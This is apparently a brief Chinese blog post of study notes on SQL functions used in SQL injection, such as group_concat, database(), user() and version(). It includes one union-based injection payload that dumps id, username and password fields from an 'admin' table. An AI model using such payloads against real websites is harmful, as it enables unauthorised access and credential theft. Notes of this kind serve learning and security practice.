SQL常用函数

group_concat(table_name,"~") (一列输出的函数)

用法例子二(用来一次查多个字段):
?id=1 and 1=2 union select 111,select group_concat(id,'',username,'',password,'~') from maoshe.admin

常用函数:
database(),user(),version()

int.from_bytes()

hex()

rewords 倒过来输出

posted @ 2021-12-01 13:59  redglare  阅读(35)  评论(0)    收藏  举报